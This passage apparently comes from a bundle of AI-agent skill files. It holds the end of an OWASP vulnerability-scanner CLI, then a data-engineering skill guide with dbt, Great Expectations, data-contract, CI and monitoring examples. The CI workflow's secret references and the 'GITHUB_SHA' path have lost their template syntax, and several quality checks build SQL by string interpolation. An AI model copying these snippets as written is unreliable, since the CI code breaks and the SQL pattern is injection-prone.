by_severity.get(f.severity, by_severity["info"]).append(f)
for sev in ["critical", "high", "medium", "low", "info"]:
group = by_severity[sev]
if not group:
continue
lines.append(f" [{sev.upper()}] ({len(group)} finding(s))")
for f in group:
lines.append(f" - {f.title} [{f.rule_id}]")
lines.append(f" File: {f.file_path}:{f.line_number}")
lines.append(f" Code: {f.code_snippet}")
lines.append(f" Fix: {f.recommendation}")
lines.append("")
return "\n".join(lines)
def main():
parser = argparse.ArgumentParser(
description="Vulnerability Scanner — Generate OWASP Top 10 checklists and scan source code for vulnerability patterns.",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="""
Examples:
%(prog)s --target web --scope full
%(prog)s --target api --scope quick --json
%(prog)s --target web --source /path/to/code --scope full
%(prog)s --target mobile --scope quick --json
""",
)
parser.add_argument("--target", choices=["web", "api", "mobile"], default="web",
help="Target application type (default: web)")
parser.add_argument("--scope", choices=["quick", "full"], default="full",
help="Scan scope: quick (high/critical only) or full (default: full)")
parser.add_argument("--source", metavar="PATH",
help="Optional: path to source code directory to scan for patterns")
parser.add_argument("--json", action="store_true", dest="json_output",
help="Output results as JSON")
args = parser.parse_args()
scanner = VulnerabilityScanner(target=args.target, scope=args.scope)
checklist = scanner.generate_checklist()
source_findings = []
if args.source:
source_findings = scanner.scan_source(args.source)
if args.json_output:
output = {
"scan_metadata": {
"target": args.target,
"scope": args.scope,
"source_path": args.source,
"generated_at": datetime.now().isoformat(),
"checklist_count": len(checklist),
"source_findings_count": len(source_findings),
},
"checklist": [asdict(c) for c in checklist],
"source_findings": [asdict(f) for f in source_findings],
}
print(json.dumps(output, indent=2))
else:
print(format_checklist_text(checklist))
if source_findings:
print(format_findings_text(source_findings))
elif args.source:
print("\nNo vulnerability patterns detected in source code.")
# Exit with non-zero if critical/high findings found in source scan
critical_high = [f for f in source_findings if f.severity in ("critical", "high")]
if critical_high:
sys.exit(1)
if __name__ == "__main__":
main()
Xây dựng data pipeline, hệ thống ETL/ELT và hạ tầng dữ liệu với Python, SQL, Spark, Airflow, dbt, Kafka và data modeling.
---
name: "senior-data-engineer"
description: Data engineering skill for building scalable data pipelines, ETL/ELT systems, and data infrastructure. Expertise in Python, SQL, Spark, Airflow, dbt, Kafka, and modern data stack. Includes data modeling, pipeline orchestration, data quality, and DataOps. Use when designing data architectures, building data pipelines, optimizing data workflows, implementing data governance, or troubleshooting data issues.
---
# Senior Data Engineer
Production-grade data engineering skill for building scalable, reliable data systems.
## Table of Contents
1. [Trigger Phrases](#trigger-phrases)
2. [Quick Start](#quick-start)
3. [Workflows](#workflows)
4. [Architecture Decision Framework](#architecture-decision-framework)
5. [Tech Stack](#tech-stack)
6. [Reference Documentation](#reference-documentation)
7. [Troubleshooting](#troubleshooting)
---
## Trigger Phrases
Activate this skill when you see:
**Pipeline Design:**
- "Design a data pipeline for..."
- "Build an ETL/ELT process..."
- "How should I ingest data from..."
- "Set up data extraction from..."
**Architecture:**
- "Should I use batch or streaming?"
- "Lambda vs Kappa architecture"
- "How to handle late-arriving data"
- "Design a data lakehouse"
**Data Modeling:**
- "Create a dimensional model..."
- "Star schema vs snowflake"
- "Implement slowly changing dimensions"
- "Design a data vault"
**Data Quality:**
- "Add data validation to..."
- "Set up data quality checks"
- "Monitor data freshness"
- "Implement data contracts"
**Performance:**
- "Optimize this Spark job"
- "Query is running slow"
- "Reduce pipeline execution time"
- "Tune Airflow DAG"
---
## Quick Start
### Core Tools
```bash
# Generate pipeline orchestration config
python scripts/pipeline_orchestrator.py generate \
--type airflow \
--source postgres \
--destination snowflake \
--schedule "0 5 * * *"
# Validate data quality
python scripts/data_quality_validator.py validate \
--input data/sales.parquet \
--schema schemas/sales.json \
--checks freshness,completeness,uniqueness
# Optimize ETL performance
python scripts/etl_performance_optimizer.py analyze \
--query queries/daily_aggregation.sql \
--engine spark \
--recommend
```
---
## Workflows
→ See references/workflows.md for details
## Architecture Decision Framework
Use this framework to choose the right approach for your data pipeline.
### Batch vs Streaming
| Criteria | Batch | Streaming |
|----------|-------|-----------|
| **Latency requirement** | Hours to days | Seconds to minutes |
| **Data volume** | Large historical datasets | Continuous event streams |
| **Processing complexity** | Complex transformations, ML | Simple aggregations, filtering |
| **Cost sensitivity** | More cost-effective | Higher infrastructure cost |
| **Error handling** | Easier to reprocess | Requires careful design |
**Decision Tree:**
```
Is real-time insight required?
├── Yes → Use streaming
│ └── Is exactly-once semantics needed?
│ ├── Yes → Kafka + Flink/Spark Structured Streaming
│ └── No → Kafka + consumer groups
└── No → Use batch
└── Is data volume > 1TB daily?
├── Yes → Spark/Databricks
└── No → dbt + warehouse compute
```
### Lambda vs Kappa Architecture
| Aspect | Lambda | Kappa |
|--------|--------|-------|
| **Complexity** | Two codebases (batch + stream) | Single codebase |
| **Maintenance** | Higher (sync batch/stream logic) | Lower |
| **Reprocessing** | Native batch layer | Replay from source |
| **Use case** | ML training + real-time serving | Pure event-driven |
**When to choose Lambda:**
- Need to train ML models on historical data
- Complex batch transformations not feasible in streaming
- Existing batch infrastructure
**When to choose Kappa:**
- Event-sourced architecture
- All processing can be expressed as stream operations
- Starting fresh without legacy systems
### Data Warehouse vs Data Lakehouse
| Feature | Warehouse (Snowflake/BigQuery) | Lakehouse (Delta/Iceberg) |
|---------|-------------------------------|---------------------------|
| **Best for** | BI, SQL analytics | ML, unstructured data |
| **Storage cost** | Higher (proprietary format) | Lower (open formats) |
| **Flexibility** | Schema-on-write | Schema-on-read |
| **Performance** | Excellent for SQL | Good, improving |
| **Ecosystem** | Mature BI tools | Growing ML tooling |
---
## Tech Stack
| Category | Technologies |
|----------|--------------|
| **Languages** | Python, SQL, Scala |
| **Orchestration** | Airflow, Prefect, Dagster |
| **Transformation** | dbt, Spark, Flink |
| **Streaming** | Kafka, Kinesis, Pub/Sub |
| **Storage** | S3, GCS, Delta Lake, Iceberg |
| **Warehouses** | Snowflake, BigQuery, Redshift, Databricks |
| **Quality** | Great Expectations, dbt tests, Monte Carlo |
| **Monitoring** | Prometheus, Grafana, Datadog |
---
## Reference Documentation
### 1. Data Pipeline Architecture
See `references/data_pipeline_architecture.md` for:
- Lambda vs Kappa architecture patterns
- Batch processing with Spark and Airflow
- Stream processing with Kafka and Flink
- Exactly-once semantics implementation
- Error handling and dead letter queues
### 2. Data Modeling Patterns
See `references/data_modeling_patterns.md` for:
- Dimensional modeling (Star/Snowflake)
- Slowly Changing Dimensions (SCD Types 1-6)
- Data Vault modeling
- dbt best practices
- Partitioning and clustering
### 3. DataOps Best Practices
See `references/dataops_best_practices.md` for:
- Data testing frameworks
- Data contracts and schema validation
- CI/CD for data pipelines
- Observability and lineage
- Incident response
---
## Troubleshooting
→ See references/troubleshooting.md for details
FILE:references/dataops_best_practices.md
# DataOps Best Practices
Comprehensive guide to DataOps practices for production data systems.
## Table of Contents
1. [Data Testing Frameworks](#data-testing-frameworks)
2. [Data Contracts](#data-contracts)
3. [CI/CD for Data Pipelines](#cicd-for-data-pipelines)
4. [Observability and Lineage](#observability-and-lineage)
5. [Incident Response](#incident-response)
6. [Cost Optimization](#cost-optimization)
---
## Data Testing Frameworks
### Great Expectations
```python
# great_expectations_suite.py
import great_expectations as gx
from great_expectations.core.batch import BatchRequest
# Initialize context
context = gx.get_context()
# Create expectation suite
suite = context.add_expectation_suite("orders_suite")
# Get validator
validator = context.get_validator(
batch_request=BatchRequest(
datasource_name="warehouse",
data_asset_name="orders",
),
expectation_suite_name="orders_suite"
)
# Schema expectations
validator.expect_table_columns_to_match_set(
column_set=["order_id", "customer_id", "amount", "created_at", "status"],
exact_match=True
)
# Completeness expectations
validator.expect_column_values_to_not_be_null(
column="order_id",
mostly=1.0 # 100% must be non-null
)
validator.expect_column_values_to_not_be_null(
column="customer_id",
mostly=0.99 # 99% must be non-null
)
# Uniqueness expectations
validator.expect_column_values_to_be_unique("order_id")
# Type expectations
validator.expect_column_values_to_be_of_type("amount", "FLOAT")
validator.expect_column_values_to_be_of_type("created_at", "TIMESTAMP")
# Range expectations
validator.expect_column_values_to_be_between(
column="amount",
min_value=0,
max_value=1000000,
mostly=0.999
)
# Categorical expectations
validator.expect_column_values_to_be_in_set(
column="status",
value_set=["pending", "confirmed", "shipped", "delivered", "cancelled"]
)
# Distribution expectations
validator.expect_column_mean_to_be_between(
column="amount",
min_value=50,
max_value=500
)
# Freshness expectations
validator.expect_column_max_to_be_between(
column="created_at",
min_value={"$PARAMETER": "now() - interval '24 hours'"},
max_value={"$PARAMETER": "now()"}
)
# Cross-table expectations (referential integrity)
validator.expect_column_pair_values_to_be_in_set(
column_A="customer_id",
column_B="customer_status",
value_pairs_set=[
("cust_001", "active"),
("cust_002", "active"),
# ...
]
)
# Save suite
validator.save_expectation_suite(discard_failed_expectations=False)
# Run validation
checkpoint = context.add_or_update_checkpoint(
name="orders_checkpoint",
validations=[
{
"batch_request": {
"datasource_name": "warehouse",
"data_asset_name": "orders",
},
"expectation_suite_name": "orders_suite",
}
],
)
results = checkpoint.run()
print(f"Validation success: {results.success}")
```
### dbt Tests
```yaml
# models/marts/schema.yml
version: 2
models:
- name: fct_orders
description: "Order fact table with comprehensive testing"
# Model-level tests
tests:
# Row count consistency
- dbt_utils.equal_rowcount:
compare_model: ref('stg_orders')
# Expression test
- dbt_utils.expression_is_true:
expression: "net_amount >= 0"
# Recency test
- dbt_utils.recency:
datepart: hour
field: _loaded_at
interval: 24
columns:
- name: order_id
description: "Primary key - unique order identifier"
tests:
- unique
- not_null
- dbt_expectations.expect_column_values_to_match_regex:
regex: "^ORD-[0-9]{10}$"
- name: customer_id
tests:
- not_null
- relationships:
to: ref('dim_customers')
field: customer_id
severity: warn # Don't fail, just warn
- name: order_date
tests:
- not_null
- dbt_expectations.expect_column_values_to_be_between:
min_value: "'2020-01-01'"
max_value: "current_date"
- name: net_amount
tests:
- not_null
- dbt_utils.accepted_range:
min_value: 0
max_value: 1000000
inclusive: true
- name: quantity
tests:
- dbt_expectations.expect_column_values_to_be_between:
min_value: 1
max_value: 1000
row_condition: "status != 'cancelled'"
- name: status
tests:
- accepted_values:
values: ['pending', 'confirmed', 'shipped', 'delivered', 'cancelled']
- name: dim_customers
columns:
- name: customer_id
tests:
- unique
- not_null
- name: email
tests:
- unique:
where: "is_current = true"
- dbt_expectations.expect_column_values_to_match_regex:
regex: "^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\\.[a-zA-Z0-9-.]+$"
# Custom generic test
# tests/generic/test_no_orphan_records.sql
{% test no_orphan_records(model, column_name, parent_model, parent_column) %}
SELECT {{ column_name }}
FROM {{ model }}
WHERE {{ column_name }} NOT IN (
SELECT {{ parent_column }}
FROM {{ parent_model }}
)
{% endtest %}
```
### Custom Data Quality Checks
```python
# data_quality/quality_checks.py
from dataclasses import dataclass
from typing import List, Dict, Any, Callable
from datetime import datetime, timedelta
import logging
logger = logging.getLogger(__name__)
@dataclass
class QualityCheck:
name: str
description: str
severity: str # "critical", "warning", "info"
check_func: Callable
threshold: float = 1.0
@dataclass
class QualityResult:
check_name: str
passed: bool
actual_value: float
threshold: float
message: str
timestamp: datetime
class DataQualityValidator:
"""Comprehensive data quality validation framework."""
def __init__(self, connection):
self.conn = connection
self.checks: List[QualityCheck] = []
self.results: List[QualityResult] = []
def add_check(self, check: QualityCheck):
self.checks.append(check)
# Built-in check generators
def add_null_check(self, table: str, column: str, max_null_rate: float = 0.0):
def check_nulls():
query = f"""
SELECT
COUNT(*) as total,
SUM(CASE WHEN {column} IS NULL THEN 1 ELSE 0 END) as nulls
FROM {table}
"""
result = self.conn.execute(query).fetchone()
null_rate = result[1] / result[0] if result[0] > 0 else 0
return null_rate <= max_null_rate, null_rate
self.add_check(QualityCheck(
name=f"null_check_{table}_{column}",
description=f"Check null rate for {table}.{column}",
severity="critical" if max_null_rate == 0 else "warning",
check_func=check_nulls,
threshold=max_null_rate
))
def add_uniqueness_check(self, table: str, column: str):
def check_unique():
query = f"""
SELECT
COUNT(*) as total,
COUNT(DISTINCT {column}) as distinct_count
FROM {table}
"""
result = self.conn.execute(query).fetchone()
is_unique = result[0] == result[1]
duplicate_rate = 1 - (result[1] / result[0]) if result[0] > 0 else 0
return is_unique, duplicate_rate
self.add_check(QualityCheck(
name=f"uniqueness_check_{table}_{column}",
description=f"Check uniqueness for {table}.{column}",
severity="critical",
check_func=check_unique,
threshold=0.0
))
def add_freshness_check(self, table: str, timestamp_column: str, max_hours: int):
def check_freshness():
query = f"""
SELECT MAX({timestamp_column}) as latest
FROM {table}
"""
result = self.conn.execute(query).fetchone()
if result[0] is None:
return False, float('inf')
hours_old = (datetime.now() - result[0]).total_seconds() / 3600
return hours_old <= max_hours, hours_old
self.add_check(QualityCheck(
name=f"freshness_check_{table}",
description=f"Check data freshness for {table}",
severity="critical",
check_func=check_freshness,
threshold=max_hours
))
def add_range_check(self, table: str, column: str, min_val: float, max_val: float):
def check_range():
query = f"""
SELECT
COUNT(*) as total,
SUM(CASE WHEN {column} < {min_val} OR {column} > {max_val} THEN 1 ELSE 0 END) as out_of_range
FROM {table}
"""
result = self.conn.execute(query).fetchone()
violation_rate = result[1] / result[0] if result[0] > 0 else 0
return violation_rate == 0, violation_rate
self.add_check(QualityCheck(
name=f"range_check_{table}_{column}",
description=f"Check range [{min_val}, {max_val}] for {table}.{column}",
severity="warning",
check_func=check_range,
threshold=0.0
))
def add_referential_integrity_check(self, child_table: str, child_column: str,
parent_table: str, parent_column: str):
def check_referential():
query = f"""
SELECT COUNT(*)
FROM {child_table} c
LEFT JOIN {parent_table} p ON c.{child_column} = p.{parent_column}
WHERE p.{parent_column} IS NULL AND c.{child_column} IS NOT NULL
"""
result = self.conn.execute(query).fetchone()
orphan_count = result[0]
return orphan_count == 0, orphan_count
self.add_check(QualityCheck(
name=f"referential_integrity_{child_table}_{child_column}",
description=f"Check FK {child_table}.{child_column} -> {parent_table}.{parent_column}",
severity="warning",
check_func=check_referential,
threshold=0
))
def run_all_checks(self) -> Dict[str, Any]:
"""Execute all quality checks and return results."""
self.results = []
for check in self.checks:
try:
passed, actual_value = check.check_func()
result = QualityResult(
check_name=check.name,
passed=passed,
actual_value=actual_value,
threshold=check.threshold,
message=f"{'PASSED' if passed else 'FAILED'}: {check.description}",
timestamp=datetime.now()
)
except Exception as e:
result = QualityResult(
check_name=check.name,
passed=False,
actual_value=-1,
threshold=check.threshold,
message=f"ERROR: {str(e)}",
timestamp=datetime.now()
)
self.results.append(result)
logger.info(result.message)
# Summary
total = len(self.results)
passed = sum(1 for r in self.results if r.passed)
failed = total - passed
critical_failures = [
r for r, c in zip(self.results, self.checks)
if not r.passed and c.severity == "critical"
]
return {
"total_checks": total,
"passed": passed,
"failed": failed,
"success_rate": passed / total if total > 0 else 0,
"critical_failures": len(critical_failures),
"results": self.results,
"overall_passed": len(critical_failures) == 0
}
```
---
## Data Contracts
### Contract Definition
```yaml
# contracts/orders_v2.yaml
contract:
name: orders
version: "2.0.0"
owner: data-platform@company.com
team: Data Engineering
slack_channel: "#data-platform-alerts"
description: |
Order events from the e-commerce platform.
Contains all customer orders with line items.
schema:
type: object
required:
- order_id
- customer_id
- created_at
- total_amount
properties:
order_id:
type: string
format: uuid
description: "Unique order identifier"
pii: false
breaking_change: never
customer_id:
type: string
description: "Customer identifier (foreign key)"
pii: true
retention_days: 365
created_at:
type: timestamp
format: "ISO8601"
timezone: "UTC"
description: "Order creation timestamp"
total_amount:
type: decimal
precision: 10
scale: 2
minimum: 0
description: "Total order amount in USD"
status:
type: string
enum: ["pending", "confirmed", "shipped", "delivered", "cancelled"]
default: "pending"
line_items:
type: array
items:
type: object
properties:
product_id:
type: string
quantity:
type: integer
minimum: 1
unit_price:
type: decimal
# Quality SLAs
quality:
freshness:
max_delay_minutes: 60
check_frequency: "*/15 * * * *" # Every 15 minutes
completeness:
required_fields_null_rate: 0.0
optional_fields_null_rate: 0.05
uniqueness:
order_id: true
combination: ["order_id", "line_item_id"]
validity:
total_amount:
min: 0
max: 1000000
status:
allowed_values: ["pending", "confirmed", "shipped", "delivered", "cancelled"]
volume:
min_daily_records: 1000
max_daily_records: 1000000
anomaly_threshold: 0.5 # 50% deviation from average
# Semantic versioning rules
versioning:
breaking_changes:
- removing_required_field
- changing_field_type
- renaming_field
non_breaking_changes:
- adding_optional_field
- adding_enum_value
- changing_description
# Consumers
consumers:
- name: analytics-dashboard
team: Analytics
contact: analytics@company.com
usage: "Daily KPI dashboards"
required_fields: ["order_id", "customer_id", "total_amount", "created_at"]
- name: ml-churn-prediction
team: ML Platform
contact: ml-team@company.com
usage: "Customer churn prediction model"
required_fields: ["customer_id", "created_at", "total_amount"]
- name: finance-reporting
team: Finance
contact: finance@company.com
usage: "Revenue reconciliation"
required_fields: ["order_id", "total_amount", "status"]
# Change management
change_process:
notification_lead_time_days: 14
approval_required_from:
- data-platform-lead
- affected-consumer-teams
rollback_plan_required: true
```
### Contract Validation
```python
# contracts/validator.py
import yaml
import json
from dataclasses import dataclass
from typing import Dict, List, Any, Optional
from datetime import datetime
import jsonschema
@dataclass
class ContractValidationResult:
contract_name: str
version: str
timestamp: datetime
passed: bool
schema_valid: bool
quality_checks_passed: bool
sla_checks_passed: bool
violations: List[Dict[str, Any]]
class ContractValidator:
"""Validate data against contract definitions."""
def __init__(self, contract_path: str):
with open(contract_path) as f:
self.contract = yaml.safe_load(f)
self.contract_name = self.contract['contract']['name']
self.version = self.contract['contract']['version']
def validate_schema(self, data: List[Dict]) -> List[Dict]:
"""Validate data against JSON schema."""
violations = []
schema = self.contract['schema']
for i, record in enumerate(data):
try:
jsonschema.validate(record, schema)
except jsonschema.ValidationError as e:
violations.append({
"type": "schema_violation",
"record_index": i,
"field": e.path[0] if e.path else None,
"message": e.message
})
return violations
def validate_quality_slas(self, connection, table_name: str) -> List[Dict]:
"""Validate quality SLAs."""
violations = []
quality = self.contract.get('quality', {})
# Freshness check
if 'freshness' in quality:
max_delay = quality['freshness']['max_delay_minutes']
query = f"SELECT MAX(created_at) FROM {table_name}"
result = connection.execute(query).fetchone()
if result[0]:
age_minutes = (datetime.now() - result[0]).total_seconds() / 60
if age_minutes > max_delay:
violations.append({
"type": "freshness_violation",
"sla": f"max_delay_minutes: {max_delay}",
"actual": f"{age_minutes:.0f} minutes old",
"severity": "critical"
})
# Completeness check
if 'completeness' in quality:
for field in self.contract['schema'].get('required', []):
query = f"""
SELECT
COUNT(*) as total,
SUM(CASE WHEN {field} IS NULL THEN 1 ELSE 0 END) as nulls
FROM {table_name}
"""
result = connection.execute(query).fetchone()
null_rate = result[1] / result[0] if result[0] > 0 else 0
max_rate = quality['completeness']['required_fields_null_rate']
if null_rate > max_rate:
violations.append({
"type": "completeness_violation",
"field": field,
"sla": f"null_rate <= {max_rate}",
"actual": f"null_rate = {null_rate:.4f}",
"severity": "critical"
})
# Uniqueness check
if 'uniqueness' in quality:
for field, should_be_unique in quality['uniqueness'].items():
if field == 'combination':
continue
if should_be_unique:
query = f"""
SELECT COUNT(*) - COUNT(DISTINCT {field})
FROM {table_name}
"""
result = connection.execute(query).fetchone()
if result[0] > 0:
violations.append({
"type": "uniqueness_violation",
"field": field,
"duplicates": result[0],
"severity": "critical"
})
# Volume check
if 'volume' in quality:
query = f"SELECT COUNT(*) FROM {table_name} WHERE DATE(created_at) = CURRENT_DATE"
result = connection.execute(query).fetchone()
daily_count = result[0]
if daily_count < quality['volume']['min_daily_records']:
violations.append({
"type": "volume_violation",
"sla": f"min_daily_records: {quality['volume']['min_daily_records']}",
"actual": daily_count,
"severity": "warning"
})
return violations
def validate(self, connection, table_name: str, sample_data: List[Dict] = None) -> ContractValidationResult:
"""Run full contract validation."""
violations = []
# Schema validation (on sample data)
schema_violations = []
if sample_data:
schema_violations = self.validate_schema(sample_data)
violations.extend(schema_violations)
# Quality SLA validation
quality_violations = self.validate_quality_slas(connection, table_name)
violations.extend(quality_violations)
return ContractValidationResult(
contract_name=self.contract_name,
version=self.version,
timestamp=datetime.now(),
passed=len([v for v in violations if v.get('severity') == 'critical']) == 0,
schema_valid=len(schema_violations) == 0,
quality_checks_passed=len([v for v in quality_violations if v.get('severity') == 'critical']) == 0,
sla_checks_passed=True, # Add SLA timing checks
violations=violations
)
```
---
## CI/CD for Data Pipelines
### GitHub Actions Workflow
```yaml
# .github/workflows/data-pipeline-ci.yml
name: Data Pipeline CI/CD
on:
push:
branches: [main, develop]
paths:
- 'dbt/**'
- 'airflow/**'
- 'tests/**'
pull_request:
branches: [main]
env:
DBT_PROFILES_DIR: ./dbt
SNOWFLAKE_ACCOUNT: { secrets.SNOWFLAKE_ACCOUNT}
SNOWFLAKE_USER: { secrets.SNOWFLAKE_USER}
SNOWFLAKE_PASSWORD: { secrets.SNOWFLAKE_PASSWORD}
jobs:
lint:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
- name: Set up Python
uses: actions/setup-python@v5
with:
python-version: '3.11'
- name: Install dependencies
run: |
pip install sqlfluff dbt-core dbt-snowflake
- name: Lint SQL
run: |
sqlfluff lint dbt/models --dialect snowflake
- name: Lint dbt project
run: |
cd dbt && dbt deps && dbt compile
test:
runs-on: ubuntu-latest
needs: lint
steps:
- uses: actions/checkout@v4
- name: Set up Python
uses: actions/setup-python@v5
with:
python-version: '3.11'
- name: Install dependencies
run: |
pip install dbt-core dbt-snowflake pytest great-expectations
- name: Run dbt tests on CI schema
run: |
cd dbt
dbt deps
dbt seed --target ci
dbt run --target ci --select state:modified+
dbt test --target ci --select state:modified+
- name: Run data contract tests
run: |
pytest tests/contracts/ -v
- name: Run Great Expectations validation
run: |
great_expectations checkpoint run ci_checkpoint
deploy-staging:
runs-on: ubuntu-latest
needs: test
if: github.ref == 'refs/heads/develop'
environment: staging
steps:
- uses: actions/checkout@v4
- name: Deploy to staging
run: |
cd dbt
dbt deps
dbt run --target staging
dbt test --target staging
- name: Run data quality checks
run: |
python scripts/run_quality_checks.py --env staging
deploy-production:
runs-on: ubuntu-latest
needs: test
if: github.ref == 'refs/heads/main'
environment: production
steps:
- uses: actions/checkout@v4
- name: Deploy to production
run: |
cd dbt
dbt deps
dbt run --target prod --full-refresh-models tag:full_refresh
dbt run --target prod
dbt test --target prod
- name: Notify on success
if: success()
run: |
curl -X POST { secrets.SLACK_WEBHOOK} \
-H 'Content-type: application/json' \
-d '{"text":"dbt production deployment successful!"}'
- name: Notify on failure
if: failure()
run: |
curl -X POST { secrets.SLACK_WEBHOOK} \
-H 'Content-type: application/json' \
-d '{"text":"dbt production deployment FAILED!"}'
```
### dbt CI Configuration
```yaml
# dbt_project.yml
name: 'analytics'
version: '1.0.0'
config-version: 2
profile: 'analytics'
model-paths: ["models"]
analysis-paths: ["analyses"]
test-paths: ["tests"]
seed-paths: ["seeds"]
macro-paths: ["macros"]
snapshot-paths: ["snapshots"]
target-path: "target"
clean-targets: ["target", "dbt_packages"]
# Slim CI configuration
on-run-start:
- "{{ dbt_utils.log_info('Starting dbt run') }}"
on-run-end:
- "{{ dbt_utils.log_info('dbt run complete') }}"
vars:
# CI testing with limited data
ci_limit: "{{ 1000 if target.name == 'ci' else none }}"
# Model configurations
models:
analytics:
staging:
+materialized: view
+schema: staging
intermediate:
+materialized: ephemeral
marts:
+materialized: table
+schema: marts
core:
+tags: ['core', 'daily']
marketing:
+tags: ['marketing', 'daily']
```
### Slim CI with State Comparison
```bash
# scripts/slim_ci.sh
#!/bin/bash
set -e
# Download production manifest for state comparison
aws s3 cp s3://dbt-artifacts/prod/manifest.json ./target/prod_manifest.json
# Run only modified models and their downstream dependencies
dbt run \
--target ci \
--select state:modified+ \
--state ./target/prod_manifest.json
# Test only affected models
dbt test \
--target ci \
--select state:modified+ \
--state ./target/prod_manifest.json
# Upload CI artifacts
dbt docs generate
aws s3 sync ./target s3://dbt-artifacts/ci/GITHUB_SHA/
```
---
## Observability and Lineage
### Data Lineage with OpenLineage
```python
# lineage/openlineage_emitter.py
from openlineage.client import OpenLineageClient
from openlineage.client.run import Run, RunEvent, RunState, Job, Dataset
from openlineage.client.facet import (
SchemaDatasetFacet,
SchemaField,
SqlJobFacet,
DataQualityMetricsInputDatasetFacet
)
from datetime import datetime
import uuid
class DataLineageEmitter:
"""Emit data lineage events to OpenLineage."""
def __init__(self, api_url: str, namespace: str = "data-platform"):
self.client = OpenLineageClient(url=api_url)
self.namespace = namespace
def emit_job_start(self, job_name: str, inputs: list, outputs: list,
sql: str = None) -> str:
"""Emit job start event."""
run_id = str(uuid.uuid4())
# Build input datasets
input_datasets = [
Dataset(
namespace=self.namespace,
name=inp['name'],
facets={
"schema": SchemaDatasetFacet(
fields=[
SchemaField(name=f['name'], type=f['type'])
for f in inp.get('schema', [])
]
)
}
)
for inp in inputs
]
# Build output datasets
output_datasets = [
Dataset(
namespace=self.namespace,
name=out['name'],
facets={
"schema": SchemaDatasetFacet(
fields=[
SchemaField(name=f['name'], type=f['type'])
for f in out.get('schema', [])
]
)
}
)
for out in outputs
]
# Build job facets
job_facets = {}
if sql:
job_facets["sql"] = SqlJobFacet(query=sql)
# Create and emit event
event = RunEvent(
eventType=RunState.START,
eventTime=datetime.utcnow().isoformat() + "Z",
run=Run(runId=run_id),
job=Job(namespace=self.namespace, name=job_name, facets=job_facets),
inputs=input_datasets,
outputs=output_datasets
)
self.client.emit(event)
return run_id
def emit_job_complete(self, job_name: str, run_id: str,
output_metrics: dict = None):
"""Emit job completion event."""
output_facets = {}
if output_metrics:
output_facets["dataQuality"] = DataQualityMetricsInputDatasetFacet(
rowCount=output_metrics.get('row_count'),
bytes=output_metrics.get('bytes')
)
event = RunEvent(
eventType=RunState.COMPLETE,
eventTime=datetime.utcnow().isoformat() + "Z",
run=Run(runId=run_id),
job=Job(namespace=self.namespace, name=job_name),
inputs=[],
outputs=[]
)
self.client.emit(event)
def emit_job_fail(self, job_name: str, run_id: str, error_message: str):
"""Emit job failure event."""
event = RunEvent(
eventType=RunState.FAIL,
eventTime=datetime.utcnow().isoformat() + "Z",
run=Run(runId=run_id, facets={
"errorMessage": {"message": error_message}
}),
job=Job(namespace=self.namespace, name=job_name),
inputs=[],
outputs=[]
)
self.client.emit(event)
# Usage example
emitter = DataLineageEmitter("http://marquez:5000/api/v1/lineage")
run_id = emitter.emit_job_start(
job_name="transform_orders",
inputs=[
{"name": "raw.orders", "schema": [
{"name": "id", "type": "string"},
{"name": "amount", "type": "decimal"}
]}
],
outputs=[
{"name": "analytics.fct_orders", "schema": [
{"name": "order_id", "type": "string"},
{"name": "net_amount", "type": "decimal"}
]}
],
sql="SELECT id as order_id, amount as net_amount FROM raw.orders"
)
# After job completes
emitter.emit_job_complete(
job_name="transform_orders",
run_id=run_id,
output_metrics={"row_count": 1500000, "bytes": 125000000}
)
```
### Pipeline Monitoring with Prometheus
```python
# monitoring/metrics.py
from prometheus_client import Counter, Gauge, Histogram, start_http_server
from functools import wraps
import time
# Define metrics
PIPELINE_RUNS = Counter(
'pipeline_runs_total',
'Total number of pipeline runs',
['pipeline_name', 'status']
)
PIPELINE_DURATION = Histogram(
'pipeline_duration_seconds',
'Pipeline execution duration',
['pipeline_name'],
buckets=[60, 300, 600, 1800, 3600, 7200]
)
ROWS_PROCESSED = Counter(
'rows_processed_total',
'Total rows processed by pipeline',
['pipeline_name', 'table_name']
)
DATA_FRESHNESS = Gauge(
'data_freshness_hours',
'Hours since last data update',
['table_name']
)
DATA_QUALITY_SCORE = Gauge(
'data_quality_score',
'Data quality score (0-1)',
['table_name', 'check_type']
)
def track_pipeline(pipeline_name: str):
"""Decorator to track pipeline execution."""
def decorator(func):
@wraps(func)
def wrapper(*args, **kwargs):
start_time = time.time()
try:
result = func(*args, **kwargs)
PIPELINE_RUNS.labels(pipeline_name=pipeline_name, status='success').inc()
return result
except Exception as e:
PIPELINE_RUNS.labels(pipeline_name=pipeline_name, status='failure').inc()
raise
finally:
duration = time.time() - start_time
PIPELINE_DURATION.labels(pipeline_name=pipeline_name).observe(duration)
return wrapper
return decorator
def record_rows_processed(pipeline_name: str, table_name: str, row_count: int):
"""Record number of rows processed."""
ROWS_PROCESSED.labels(pipeline_name=pipeline_name, table_name=table_name).inc(row_count)
def update_freshness(table_name: str, hours_since_update: float):
"""Update data freshness metric."""
DATA_FRESHNESS.labels(table_name=table_name).set(hours_since_update)
def update_quality_score(table_name: str, check_type: str, score: float):
"""Update data quality score."""
DATA_QUALITY_SCORE.labels(table_name=table_name, check_type=check_type).set(score)
# Start metrics server
if __name__ == '__main__':
start_http_server(8000)
```
### Alerting Configuration
```yaml
# alerting/prometheus_rules.yml
groups:
- name: data_quality_alerts
rules:
- alert: DataFreshnessAlert
expr: data_freshness_hours > 24
for: 15m
labels:
severity: critical
team: data-platform
annotations:
summary: "Data freshness SLA violated"
description: "Table {{ $labels.table_name }} has not been updated for {{ $value }} hours"
- alert: DataQualityDegraded
expr: data_quality_score < 0.95
for: 10m
labels:
severity: warning
team: data-platform
annotations:
summary: "Data quality below threshold"
description: "Table {{ $labels.table_name }} quality score is {{ $value }}"
- alert: PipelineFailure
expr: increase(pipeline_runs_total{status="failure"}[1h]) > 0
for: 5m
labels:
severity: critical
team: data-platform
annotations:
summary: "Pipeline failure detected"
description: "Pipeline {{ $labels.pipeline_name }} has failed"
- alert: PipelineSlowdown
expr: histogram_quantile(0.95, rate(pipeline_duration_seconds_bucket[1h])) > 3600
for: 30m
labels:
severity: warning
team: data-platform
annotations:
summary: "Pipeline execution time degraded"
description: "Pipeline {{ $labels.pipeline_name }} p95 duration is {{ $value }} seconds"
- alert: LowRowCount
expr: increase(rows_processed_total[24h]) < 1000
for: 1h
labels:
severity: warning
team: data-platform
annotations:
summary: "Unusually low row count"
